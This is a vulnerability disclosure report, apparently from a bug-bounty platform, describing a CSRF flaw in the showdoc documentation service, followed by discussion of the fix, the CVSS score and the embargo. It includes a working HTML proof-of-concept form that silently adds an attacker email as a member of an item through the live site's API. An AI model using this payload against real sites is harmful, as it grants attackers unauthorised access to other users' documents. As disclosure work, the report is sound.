Cross-Site Request Forgery (CSRF) in star7th/showdoc
Reported on
Aug 3rd 2021
✍️ Description
With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker site.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address evil@mail.com that already should registered befor have access to item with id 1531601670203340.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of reveal any item.
Fix
Set SameSite attribute of cookies to Lax or Strict.
@admin hey man how are doing now ? I hope be fine...
can you able to send message to maintainer ?
We will get around to reaching out to the maintainer today! Cheers.
@admin dear jamie you reached them before as two reports have been validated yesterday.
But I will only be on the official website https://www.showdoc.com.cn/ Repair. Open source showdoc https://github.com/star7th/showdoc It may not be repaired. Because the domain name of the open source showdoc is user-defined, it cannot be written in the code filtering rules. If the user is allowed to configure it by himself, the configuration complexity will be increased. I prefer that showdoc can be used out of the box.
Considering that the open source version of showdoc is mostly used for intra team collaboration, the impact of this problem is relatively small.
@admin I think according to dear showdoc team talks we should change the impact from high to low. thanks.
The official website https://www.showdoc.com.cn/ has been repaired. You can test it .
@amammad - can you suggest a new CVSS score and vector string? I will update accordingly.
Furthermore, @maintainer, if you could confirm the commit SHA that fixes this vulnerability, that would be great!
@admin
the Confidentiality and Integrity should be low and availability` should be None. All other items can be remain as before.
new CVSS score can be 4.5 that is lowest score for any CSRF.
@amammad - I have changed the vector items as requested, and this adjusts the score to 5.4?
@maintainer - just a heads up that 28 days have passed since validation.
Are you happy for us to make this report live and for us to publish a CVE, or do you have a patch prepared for this?
Would you like to extend the embargo date?
